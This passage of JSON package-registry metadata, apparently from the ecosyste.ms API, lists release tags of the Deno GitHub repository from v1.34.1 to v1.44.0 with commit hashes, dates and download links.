hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/